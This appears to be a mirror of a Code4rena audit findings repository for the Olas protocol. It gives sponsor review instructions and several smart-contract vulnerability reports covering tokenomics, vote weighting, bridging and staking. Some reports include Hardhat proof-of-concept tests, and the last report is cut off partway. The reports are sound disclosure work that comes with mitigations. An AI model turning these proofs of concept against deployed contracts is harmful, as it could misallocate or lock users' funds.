GithubHelp home page GithubHelp logo

2024-05-olas-findings's Introduction

Olas Audit

Audit findings are submitted to this repo.

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.

Note that when the repo is public, after all issues are mitigated, your comments will be publicly visible; they may also be included in your C4 audit report.


Review phase

Sponsors have three critical tasks in the audit process: Reviewing the two lists of curated issues, and once you have mitigated your findings, sharing those mitigations.

  1. Respond to curated High- and Medium-risk submissions ↓
  2. Respond to curated Low-risk submissions ↓
  3. Share your mitigation of findings (optional) ↓

Note: It’s important to be sure to only review issues from the curated lists. There are two lists of curated issues to review, which filter out unsatisfactory issues that don't require your attention.


      

Types of findings

(expand to read more)

High- or Medium-risk findings

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

QA reports and Gas reports

Any warden submissions in these two categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity findings and governance/centralization risk findings from an individual warden.
  • Gas reports (if applicable) include all gas optimization recommendations from an individual warden.

1. Respond to curated High- and Medium-risk submissions

This curated list will shorten as you work. View the original, longer list →

For each curated High- or Medium-risk finding, please:

1a. Label as one of the following:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note: Adding or changing labels other than those in this list will be automatically reverted by our bot, which will note the change in a comment on the issue.

1b. Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, leave a comment indicating your reasoning for the judge to review. For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.


2. Respond to curated Low-risk submissions

This curated list will shorten as you work. View the original, longer list →

  • Leave a comment for the judge on any reports you consider to be particularly high quality.
  • Add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once Step 1 and 2 are complete

When you have finished labeling and responding to findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.


3. Share your mitigation of findings (Optional)

Once you have confirmed the findings you intend to mitigate, you will want to address them before tha audit report is made public. Linking your mitigation PRs to your audit findings enables us to include them in your C4 audit report.

Note: You can work on your mitigations during the judging phase -- or beyond it, if you need more time. We won't publish the final audit report until you give us the OK.

If you are planning a Code4rena mitigation review:

  1. In your own Github repo, create a branch based off of the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding that you confirmed (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

This will allow for complete transparency in showing the work of mitigating the issues found in the audit.

2024-05-olas-findings's People

Contributors

howlbot-integration[bot] avatar c4-bot-4 avatar c4-bot-9 avatar c4-bot-8 avatar c4-judge avatar c4-bot-1 avatar c4-bot-7 avatar c4-bot-10 avatar c4-bot-2 avatar c4-bot-3 avatar c4-bot-5 avatar c4-bot-6 avatar liveactionllama avatar jacobheun avatar code4rena-id[bot] avatar

Stargazers

Mr Abdullah avatar sintayew gashaw avatar Martin Marchev avatar

Watchers

Ashok avatar

2024-05-olas-findings's Issues

Wrong maxBond/effectiveBond calculation in function Tokenomics.initializeTokenomics

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L509-L511
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L469-L473

Vulnerability details

Impact

  • Wrong maxBond/effectiveBond calculation
  • Allows more OLAS token to be used in bond program

Proof of Concept

Function Tokenomics.initializeTokenomics currently calculates initial maxBond/effectiveBond value for epoch 1 as follows:

 uint256 _timeLaunch = IOLAS(_olas).timeLaunch();
 if (block.timestamp >= (_timeLaunch + ONE_YEAR)) {
            revert Overflow(_timeLaunch + ONE_YEAR, block.timestamp);
 }
 uint256 zeroYearSecondsLeft = uint32(_timeLaunch + ONE_YEAR - block.timestamp);
 uint256 _inflationPerSecond = getInflationForYear(0) / zeroYearSecondsLeft;
 uint256 _maxBond = (_inflationPerSecond * _epochLen * _maxBondFraction) / 100;
 maxBond = uint96(_maxBond);
 effectiveBond = uint96(_maxBond);

In summary, here is the flow of calculation:

  • The function will revert if if the current time - (olas time launch) >= one year
  • Then the inflationPerSecond = (inflation for year 0 = 3_159_000e18 ) / timeLaunch + one year - block.timestamp)
  • Then effectiveBond = (_inflationPerSecond * _epochLen * _maxBondFraction) / 100;

The problem is, if zeroYearSecondsLeft < epochLen then effectiveBond will end up larger than it should and will even break the all time inflation caps in edge cases.

For example:

  • Suppose epochLen = 30 days, initializeTokenomics is called after (1 year - 5 minutes) of olas launch time and _maxBondFraction = 50, _epochLen = 30 days
  • Then zeroYearSecondsLeft = _timeLaunch + ONE_YEAR - block.timestamp = 5 minutes = 300
  • _inflationPerSecond = getInflationForYear(0) / zeroYearSecondsLeft = 3_159_000e18/300 = 1.053e22
  • effectiveBond = maxBond = (_inflationPerSecond * _epochLen * _maxBondFraction) / 100 = 1.053e22 * (30*24*3600) * 50/ 100 = 1.364688e+28
  • The value 1.364688e+28 is 4320 times more than max inflation cap for year 0 and larger than all inflation caps combined in 10 years defined in file TokenomicsConstants:
uint88[10] memory inflationAmounts = [
                3_159_000e18,
                40_254_084e18,
                40_400_000e18,
                56_000_000e18,
                80_000_000e18,
                72_000_000e18,
                64_000_000e18,
                48_000_000e18,
                40_000_000e18,
                29_686_916e18
            ];

Below is a POC for the above case, save this test case to file tokenomics/test/Tokenomics.js and run it using command:
npx hardhat test test/Tokenomics.js --grep effectiveBond:

it("Wrong maxBond/effectiveBond calculation at Tokenomics initialization", async function () {
            // Wait some time
            const timeLaunch = await olas.timeLaunch();
            console.log(`Time launch ${timeLaunch}`)
            await helpers.time.increase(oneYear - 5*60);


            const customTokenomicsMaster = await tokenomicsFactory.deploy();
            await customTokenomicsMaster.deployed();
            proxyData = customTokenomicsMaster.interface.encodeFunctionData("initializeTokenomics",
            [olas.address, treasury.address, deployer.address, deployer.address, ve.address, epochLen,
                componentRegistry.address, agentRegistry.address, serviceRegistry.address, donatorBlacklist.address]);

            // Deploy tokenomics proxy based on the needed tokenomics initialization
            const CustomTokenomicsProxy = await ethers.getContractFactory("TokenomicsProxy");
            const customTokenomicsProxy = await CustomTokenomicsProxy.deploy(customTokenomicsMaster.address, proxyData);
            await customTokenomicsProxy.deployed();

            let customTokenomics = await ethers.getContractAt("Tokenomics", customTokenomicsProxy.address);

            const effectiveBond = await customTokenomics.effectiveBond();
            const year0Infaltion = await customTokenomics.getInflationForYear(0);
            console.log(`Effective bond ${effectiveBond}, Year 0 inflation : ${year0Infaltion}`);
            console.log(`Effective bond is ${effectiveBond/year0Infaltion} times max inflation for year 0`);


        });

Tools Used

Manual review

Recommended Mitigation Steps

The problem arises because function initializeTokenomics assumes that the zeroYearSecondsLeft is always larger than epochLen, so to fix it, the code needs to check if zeroYearSecondsLeft < epochLen, in that case, effectiveBond= maxBond = (year 0 inflation) * _maxBondFraction/100

Assessed type

Math

if `removeNominee` is called then `_getSum` will skip a week in its update

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L223-L249
https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L586-L636

Vulnerability details

Issue Description

The removeNominee function is used to remove a nominee from the voting system. When the function is called it does invoke both _getWeight on the removed nominee and _getSum to update all other nominees.

The function will also update the pointsSum.bias for the next timestamp nextTime in order to remove the weight associated with nominee being removed, and the function sets the global timestamp timeSum to be nextTime as shown below:

function removeNominee(bytes32 account, uint256 chainId) external {
    // Check for the contract ownership
    if (msg.sender != owner) {
        revert OwnerOnly(owner, msg.sender);
    }

    // Get the nominee struct and hash
    Nominee memory nominee = Nominee(account, chainId);
    bytes32 nomineeHash = keccak256(abi.encode(nominee));

    // Get the nominee id in the nominee set
    uint256 id = mapNomineeIds[nomineeHash];
    if (id == 0) {
        revert NomineeDoesNotExist(account, chainId);
    }

    // Set nominee weight to zero
    uint256 oldWeight = _getWeight(account, chainId);
    uint256 oldSum = _getSum();
    uint256 nextTime = (block.timestamp + WEEK) / WEEK * WEEK;
    pointsWeight[nomineeHash][nextTime].bias = 0;
    timeWeight[nomineeHash] = nextTime;

    // Account for the the sum weight change
    uint256 newSum = oldSum - oldWeight;
    pointsSum[nextTime].bias = newSum;
    timeSum = nextTime;

    ...
}

The fact that the function timeSum equal to nextTime will provoke an issue as nextTime will represent next week timestamp which wasn't yet included in the _getSum function update when its was called, and because now timeSum equals nextTime the _getSum function will skip that week in its calculation as it starts immediatly from the week that will come after (explained by t += WEEK):

function _getSum() internal returns (uint256) {
    // t is always > 0 as it is set in the constructor
    uint256 t = timeSum;
    Point memory pt = pointsSum[t];
    for (uint256 i = 0; i < MAX_NUM_WEEKS; i++) {
        if (t > block.timestamp) {
            break;
        }
        t += WEEK;
        uint256 dBias = pt.slope * WEEK;
        if (pt.bias > dBias) {
            pt.bias -= dBias;
            uint256 dSlope = changesSum[t];
            pt.slope -= dSlope;
        } else {
            pt.bias = 0;
            pt.slope = 0;
        }

        pointsSum[t] = pt;
        if (t > block.timestamp) {
            timeSum = t;
        }
    }
    return pt.bias;
}

This means that the week represented by removeNominee in nextTime call will not get its changes changesSum recorded as the _getSum function will skip that week, and thus the vote weights logic accounting will get compromised which will impact all the staking system

Here is an example showcasing how a timestamp representing a week will be skipped due to the issue in the removeNominee function:

Example Scenario

Assume the current timestamp is block.timestamp = 1650000000 (April 15, 2022, 14:20:00 UTC), and WEEK is defined as 604800 seconds (1 week).

Initial State:

  • timeSum = 1649472000 (April 8, 2022, 00:00:00 UTC)
  • pointsSum = {1649472000: Point { bias: 100, slope: 2 }}
  • changesSum = {}

A nominee is being removed with removeNominee function. The next week's timestamp (nextTime) will be calculated as follows:

  • nextTime = (1650000000 + 604800) / 604800 * 604800 = 1650076800 (April 22, 2022, 00:00:00 UTC)

Steps in removeNominee:

  1. Assume _getWeight(account, chainId) returns 20.
  2. oldWeight = 20
  3. _getSum() is called and returns the current sum (100).
  4. nextTime = 1650076800
  5. pointsWeight[nomineeHash][nextTime].bias = 0 (weight set to zero for removed nominee for next week)
  6. timeWeight[nomineeHash] = nextTime (time of weight update for nominee is set to next week)
  7. Calculate new sum: newSum = oldSum - oldWeight = 100 - 20 = 80
  8. Update sum for next week: pointsSum[nextTime].bias = 80
  9. timeSum is set to nextTime: timeSum = 1650076800

State After removeNominee Execution:

  • timeSum = 1650076800 (April 22, 2022, 00:00:00 UTC)
  • pointsSum = {1649472000: Point { bias: 100, slope: 2 }, 1650076800: Point { bias: 80, slope: 2 }}

Now, when _getSum is called again, it will process weeks starting from timeSum (April 29, 2022), skipping the week (April 22, 2022) because it computes t += WEEK directly and thus the changes for the week April 22, 2022 (any changesSum modifications) were not applied, compromising the voting weight logic and potentially affecting the entire staking system.

Impact

The voting weight logic will be compromised after a nominee get removed.

Tools Used

Manual review, VS Code

Recommended Mitigation

To simplest way to address this issue is to not update timeSum state directly removeNominee and let it be update in when _getSum is called.

Assessed type

Error

Contract Tokenonics does not check incentives by owner address

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L1348-L1350
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L592-L611

Vulnerability details

Impact

  • Owners could loose their incentives if registries are updated or they transfer their components/agents NFTs.

Proof of Concept

Contract Tokenomics currently tracks incentives using unitId (id of component/agent), the incentives information is stored in mapUnitIncentives variable

// Mapping of component / agent Id => incentive balances
    mapping(uint256 => mapping(uint256 => IncentiveBalances)) public mapUnitIncentives;
// Struct for component / agent incentive balances
struct IncentiveBalances {
    // Reward in ETH
    // Even if the ETH inflation rate is 5% per year, it would take 130+ years to reach 2^96 - 1 of ETH total supply
    uint96 reward;
    // Pending relative reward in ETH
    uint96 pendingRelativeReward;
    // Top-up in OLAS
    // After 10 years, the OLAS inflation rate is 2% per year. It would take 220+ years to reach 2^96 - 1
    uint96 topUp;
    // Pending relative top-up
    uint96 pendingRelativeTopUp;
    // Last epoch number the information was updated
    // This number cannot be practically bigger than the number of blocks
    uint32 lastEpoch;
}

When a user claims their incentives via accountOwnerIncentives function, the function will revert if the input account is not the owner of the agent/component:

function accountOwnerIncentives(
        address account,
        uint256[] memory unitTypes,
        uint256[] memory unitIds
    )
{
...
// Check the component / agent Id ownership
            address unitOwner = IToken(registries[unitTypes[i]]).ownerOf(unitIds[i]);
            if (unitOwner != account) {
                revert OwnerOnly(unitOwner, account);
            }
...
}

However, the components/agents can be transferred as normal NFTs because contracts AgentRegistry and ComponentRegistry both inherits ERC721 and does not forbid transferring token.
Therefore, if an owner transfer their NFT to others, they lost their incentives. The Olas docs said that The primary goal is to create a sustainable ecosystem to incentivize developers to contribute to the network and reward them for their participation proportionally to their efforts, while the platform itself grows and becomes more valuable. An owner should expect that they can claim the incentives donated to their components/agents before they transfer their components/agents to others (because it's their effort/contribution up to that time).

Moreover, registries can be changed by Tokenomics owner via function changeRegistries:

function changeRegistries(address _componentRegistry, address _agentRegistry, address _serviceRegistry) external {
        // Check for the contract ownership
        if (msg.sender != owner) {
            revert OwnerOnly(msg.sender, owner);
        }

        // Check for registries addresses
        if (_componentRegistry != address(0)) {
            componentRegistry = _componentRegistry;
            emit ComponentRegistryUpdated(_componentRegistry);
        }
        if (_agentRegistry != address(0)) {
            agentRegistry = _agentRegistry;
            emit AgentRegistryUpdated(_agentRegistry);
        }
        if (_serviceRegistry != address(0)) {
            serviceRegistry = _serviceRegistry;
            emit ServiceRegistryUpdated(_serviceRegistry);
        }
    }

If registries are changed, owners of old components/agents will also loose all their incentives.

Below is a POC for the above issue, save this test case to file tokenomics/test/DispenserDevIncentives.js and run it using command:
npx hardhat test test/DispenserDevIncentives.js --grep IncentivesLost

it("IncentivesLost", async () =>  {
            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            // Skip the number of seconds for 2 epochs
            await helpers.time.increase(epochLen + 10);
            await tokenomics.connect(deployer).checkpoint();
            await helpers.time.increase(epochLen + 10);
            await tokenomics.connect(deployer).checkpoint();

            // Send ETH to treasury
            const amount = ethers.utils.parseEther("1000");
            await deployer.sendTransaction({to: treasury.address, value: amount});

            // Lock OLAS balances with Voting Escrow
            const minWeightedBalance = await tokenomics.veOLASThreshold();
            await ve.setWeightedBalance(minWeightedBalance.toString());
            await ve.createLock(deployer.address);

            // Change the first service owner to the deployer (same for components and agents)
            await serviceRegistry.changeUnitOwner(1, deployer.address);
            await componentRegistry.changeUnitOwner(1, deployer.address);
            await agentRegistry.changeUnitOwner(1, deployer.address);

            // Send donations to services
            await treasury.connect(deployer).depositServiceDonationsETH([1, 2], [regDepositFromServices, regDepositFromServices],
                {value: twoRegDepositFromServices});
            // Move more than one epoch in time
            await helpers.time.increase(epochLen + 10);
            await tokenomics.connect(deployer).checkpoint();


            // Check for the incentive balances of component and agent such that their pending relative incentives are non-zero
            let incentiveBalances = await tokenomics.mapUnitIncentives(0, 1);
            expect(Number(incentiveBalances.pendingRelativeReward)).to.greaterThan(0);
            expect(Number(incentiveBalances.pendingRelativeTopUp)).to.greaterThan(0);
            incentiveBalances = await tokenomics.mapUnitIncentives(1, 1);
            expect(incentiveBalances.pendingRelativeReward).to.greaterThan(0);
            expect(incentiveBalances.pendingRelativeTopUp).to.greaterThan(0);


            // changing registries
            await componentRegistry.changeUnitOwner(1, signers[3].address);
            await expect(
                dispenser.connect(deployer).callStatic.claimOwnerIncentives([0, 1], [1, 1])
            ).to.be.revertedWithCustomError(tokenomics, "OwnerOnly");
        });

Tools Used

Manual Review

Recommended Mitigation Steps

Contract Tokenomics should track the incentives by owner (regardless of old or new) instead of unit Ids.

Assessed type

Governance

Tokens bridged to Polygon can get stuck

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/PolygonDepositProcessorL1.sol#L25-L26
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/PolygonDepositProcessorL1.sol#L64-L72

Vulnerability details

Relevant code: PolygonDepositProcessorL1::predicate, PolygonDepositProcessorL1::_sendMessage

Description

When bridging token incentives with PolygonDepositProcessorL1, the tokens need to be sent to a predicate contract, which is used to lock the tokens on L1:

// ERC20 Predicate contract address
address public immutable predicate;

function _sendMessage(...) {
	if (transferAmount > 0) {
	    IToken(olas).approve(predicate, transferAmount);
	    IBridge(l1TokenRelayer).depositFor(l2TargetDispenser, olas, abi.encode(transferAmount));
	}
}

The predicate contract is set as immutable, which is an issue as the Polygon PoS bridge allows for changing it or having multiple of them:

bytes32 tokenType = tokenToType[rootToken];
require(
    rootToChildToken[rootToken] != address(0x0) &&
       tokenType != 0,
    "RootChainManager: TOKEN_NOT_MAPPED"
);
address predicateAddress = typeToPredicate[tokenType];
require(
    predicateAddress != address(0),
    "RootChainManager: INVALID_TOKEN_TYPE"
);

This means that if the predicate is changed in the Polygon bridge, the PolygonDepositProcessorL1 will continue locking tokens on the old L1 predicate and this will prevent tokens arriving at the destination Service contract.

Root Cause

Hardcoded value: address public immutable predicate;

Impact

Changing predicate contract in Polygon bridge will incorrectly lock funds on L1 and would not bridge to L2. Funds are not lost forever but it can become really complicated to work well, because PolygonDepositProcessorL1 will always point to the same predicate and processor would have to be updated. Afterwards additional steps need to be performed to retrieve the funds from old predicate. All of this will significantly delay token rewards on Polygon and increase operational overhead.

Suggested Mitigation

Fortunately it is easy to mitigate this issue if you get the correct predicate contract from the bridge.

First modify the IBridge interface to include the following functions:

interface IBridge {
	...
	function tokenToType(address) external returns(bytes32);
	function typeToPredicate(bytes32) external returns(address);
}

Next, modify the PolygonDepositProcessorL1::_sendMessage function:

if (transferAmount > 0) {
    bytes32 tokenType = IBridge(l1TokenRelayer).tokenToType(olas);
    bytes32 predicate = IBridge(l1TokenRelayer).typeToPredicate(tokenType);
    IToken(olas).approve(predicate, transferAmount);
    IBridge(l1TokenRelayer).depositFor(l2TargetDispenser, olas, abi.encode(transferAmount));
}

Finally, remove the predicate state variable:

- address public immutable predicate;

Assessed type

Other

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor by commenting or interacting with this repo prior to public release of the contest report, you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

EVM chain id used instead of Wormhole chain id for `refundChain` in `WormholeDepositProcessorL1`

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L96-L97

Vulnerability details

Vulnerability Details

The EVM chain id (which is l2TargetChainId) is used for the refundChain parameter instead of the Wormhole chain id (which is wormholeTargetChainId).

WormholeDepositProcessorL1.sol#L96-L97

        sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
            gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);

For this particular function, the refundChain must be specified in Wormhole chain id instead of the EVM chain id. Please note that Wormhole chain id is not the same as EVM chain id. See here for more information.

Wormhole chain id must be used because sendTokenWithPayloadToEvm uses sendVaasToEvm which also expects the refundChain to be in the Wormhole chain id format.

TokenBase.sol#L125-L155

    function sendTokenWithPayloadToEvm(
        uint16 targetChain,
        address targetAddress,
        bytes memory payload,
        uint256 receiverValue,
        uint256 gasLimit,
        address token,
        uint256 amount,
        uint16 refundChain,
        address refundAddress
    ) internal returns (uint64) {
        VaaKey[] memory vaaKeys = new VaaKey[](1);
        vaaKeys[0] = transferTokens(token, amount, targetChain, targetAddress);

        (uint256 cost, ) = wormholeRelayer.quoteEVMDeliveryPrice(
            targetChain,
            receiverValue,
            gasLimit
        );
        return
            wormholeRelayer.sendVaasToEvm{value: cost}(
                targetChain,
                targetAddress,
                payload,
                receiverValue,
                gasLimit,
                vaaKeys,
                refundChain,
                refundAddress
            );
    }

IWormholeRelayer.sol#L161-L191

    /**
     * @notice Publishes an instruction for the default delivery provider
     * to relay a payload and VAAs specified by `vaaKeys` to the address `targetAddress` on chain `targetChain`
     * with gas limit `gasLimit` and `msg.value` equal to `receiverValue`
     *
     * Any refunds (from leftover gas) will be sent to `refundAddress` on chain `refundChain`
     * `targetAddress` must implement the IWormholeReceiver interface
     *
     * This function must be called with `msg.value` equal to `quoteEVMDeliveryPrice(targetChain, receiverValue, gasLimit)`
     *
     * @param targetChain in Wormhole Chain ID format
     * @param targetAddress address to call on targetChain (that implements IWormholeReceiver)
     * @param payload arbitrary bytes to pass in as parameter in call to `targetAddress`
     * @param receiverValue msg.value that delivery provider should pass in for call to `targetAddress` (in targetChain currency units)
     * @param gasLimit gas limit with which to call `targetAddress`. Any units of gas unused will be refunded according to the
     *        `targetChainRefundPerGasUnused` rate quoted by the delivery provider
     * @param vaaKeys Additional VAAs to pass in as parameter in call to `targetAddress`
     * @param refundChain The chain to deliver any refund to, in Wormhole Chain ID format
     * @param refundAddress The address on `refundChain` to deliver any refund to
     * @return sequence sequence number of published VAA containing delivery instructions
     */
    function sendVaasToEvm(
        uint16 targetChain,
        address targetAddress,
        bytes memory payload,
        uint256 receiverValue,
        uint256 gasLimit,
        VaaKey[] memory vaaKeys,
        uint16 refundChain,
        address refundAddress
    ) external payable returns (uint64 sequence);

Impact

Refunds sent to incorrect chain and possibly wrong address.

Tools Used

Manual

Recommended Mitigation Steps

-        sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
            gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);
+        sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
            gasLimitMessage, olas, transferAmount, uint16(wormholeTargetChainId), refundAccount);

Assessed type

Other

`withheldToken` logic: total claimed amount can be greater than the emissionsAmount for a target

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160-L210

Vulnerability details

Impact

The total incentives that gets claimed by a target can be more than the emissionsAmount for that target.

Proof of Concept

DefaultTargetDispenserL2#_processData: If claimedAmount>emissionAmount, claimedAmount-emissionsAmount should be withheld. But this logic isn't so effective cos totalClaimedAmount can be greater than emissionsAmount if each claimedAmount < emissionsAmount.
For example,

  • say emissionsAmount for a target is 1000 olas
  • if claimStakingIncentive gets called for that target, and the claimed olas=1100, protocol "withholds" 100 olas
  • but if claimStakingIncentive gets called two times at times t1, t2 such that claimedOLAS at t1=550, claimedOLAS at t2=550, no tokens will be withheld even though the totalClaimedOLAS=1100, which is greater than the emissionsAmount.

This is because DefaultTargetDispenser#_processData only checks the current amount being claimed against the emissionsAmount for the target:

function _processData(bytes memory data) internal {
    ...
    for(uint256 i=0;i<targets.length;++i){
        ...
        bytes memory verifyData = abi.encodeCall(IStakingFactory.verifyInstanceAndGetEmissionsAmount, target);
        (bool success, bytes memory returnData) = stakingFactory.call(verifyData);

        uint256 limitAmount;

        if (success && returnData.length == 32) {
            limitAmount = abi.decode(returnData, (uint256));
        }

        if (limitAmount == 0) {
            // Withhold OLAS for further usage
            localWithheldAmount += amount;
            emit AmountWithheld(target, amount);

            // Proceed to the next target
            continue;
        }

        // Check the amount limit and adjust, if necessary
        if (amount > limitAmount) {
            uint256 targetWithheldAmount = amount - limitAmount;
            localWithheldAmount += targetWithheldAmount;
            amount = limitAmount;

            emit AmountWithheld(target, targetWithheldAmount);
        }
        ...
    }
    ...
    if (localWithheldAmount > 0) {
        withheldAmount += localWithheldAmount;
    }
    ...
}

Tools Used

Manual Review

Recommended Mitigation Steps

A totalClaimedAmount parameter for a target should be updated each time reward is claimed
If the totalClaimedAmount>emissionAmount, the witheldTokens should be set to totalClaimedAmount-emissionsAmount

Assessed type

Error

Cross-chain gas fees are double paid for Optimism bridging.

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismDepositProcessorL1.sol#L95-L144
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismTargetDispenserL2.sol#L55-L92

Vulnerability details

Vulnerability Details

There is currently a misunderstanding of how the cross-chain gas is paid for in the Optimism bridge.

In particular, from the code below, it seems that you need to pay for the cross-chain gas by sending ETH to the Optimism CrossDomainMessenger. This can be seen in how a cost amount of ETH is passed to the CrossDomainMessenger contract.

OptimismDepositProcessorL1.sol#L95-L144

    function _sendMessage(
        address[] memory targets,
        uint256[] memory stakingIncentives,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) internal override returns (uint256 sequence) {
        // Check for the bridge payload length
        if (bridgePayload.length != BRIDGE_PAYLOAD_LENGTH) {
            revert IncorrectDataLength(BRIDGE_PAYLOAD_LENGTH, bridgePayload.length);
        }

        // Check for the transferAmount > 0
        if (transferAmount > 0) {
            // Deposit OLAS
            // Approve tokens for the predicate bridge contract
            // Source: https://github.com/maticnetwork/pos-portal/blob/5fbd35ba9cdc8a07bf32d81d6d1f4ce745feabd6/flat/RootChainManager.sol#L2218
            IToken(olas).approve(l1TokenRelayer, transferAmount);

            // Transfer OLAS to L2 staking dispenser contract across the bridge
            IBridge(l1TokenRelayer).depositERC20To(olas, olasL2, l2TargetDispenser, transferAmount,
                uint32(TOKEN_GAS_LIMIT), "");
        }

        // Decode cost related data
        (uint256 cost, uint256 gasLimitMessage) = abi.decode(bridgePayload, (uint256, uint256));
        // Check for zero values
        if (cost == 0 || gasLimitMessage == 0) {
            revert ZeroValue();
        }

        // Check for the max message gas limit
        if (gasLimitMessage > MESSAGE_GAS_LIMIT) {
            revert Overflow(gasLimitMessage, MESSAGE_GAS_LIMIT);
        }

        // Check that provided msg.value is enough to cover the cost
        if (cost > msg.value) {
            revert LowerThan(msg.value, cost);
        }

        // Assemble data payload
        bytes memory data = abi.encodeWithSelector(RECEIVE_MESSAGE, abi.encode(targets, stakingIncentives));

        // Send message to L2
        // Reference: https://docs.optimism.io/builders/app-developers/bridging/messaging#for-l1-to-l2-transactions-1
        IBridge(l1MessageRelayer).sendMessage{value: cost}(l2TargetDispenser, data, uint32(gasLimitMessage));

        // Since there is no returned message sequence, use the staking batch nonce
        sequence = stakingBatchNonce;
    }

This is incorrect, that is because instead, in Optimism, the cross-chain gas is paid by:

  • For L1 -> L2 transactions: the L1 gas is burnt in the Optimism bridge in Optimism's ResourceMetering to pay for the cross-chain gas in L2

  • For L2 -> L1 transactions: the user pays for the L1 gas by executing the functions proveWithdrawalTransaction and finalizeWithdrawalTransaction in OptimismPortal on the L1 to complete the cross-chain transactions

So in reality, there is no need to pass ETH to the CrossDomainMessenger to pay for the cross-chain gas.

This affects the OptimismTargetDispenserL2 contract as well

Impact

Using the contracts as intended will cause unnecessary ETH to be sent and stuck in the OptimismDepositProcessorL1 and OptimismTargetDispenserL2, that is being misunderstood as the ETH being paid for the cross-chain gas.

Tools Used

Manual

Recommended Mitigation Steps

Remove the cost variables from the Optimism-related contracts.

Assessed type

Other

Griefing attack on unstaking services

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L818

Vulnerability details

Impact

A malicious user can execute griefing attack to prevent service owners from unstaking when the available reward is zero.

Proof of Concept

The owner of a service is allowed to unstake if the service is staked long enough (more than minStakingDuration) or available reward is zero.

    function unstake(uint256 serviceId) external returns (uint256 reward) {
        //....

        uint256 ts = block.timestamp - tsStart;
        if (ts <= minStakingDuration && availableRewards > 0) {
            revert NotEnoughTimeStaked(serviceId, ts, minStakingDuration);
        }

        //.....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L818

This provides an opportunity for a malicious user to apply griefing attack.

Suppose serviceA is staked (not more than minStakingDuration) and the service multisig has made transactions either. So, some rewards should be allocated to this multisig (assuming isRatioPass returns true). Thus, the function checkpointAndClaim is called to claim the rewards. This function first calls checkpoint() to calculate the rewards and then transfers the rewards to the multisig.

    function checkpointAndClaim(uint256 serviceId) external returns (uint256) {
        return _claim(serviceId, true);
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L884

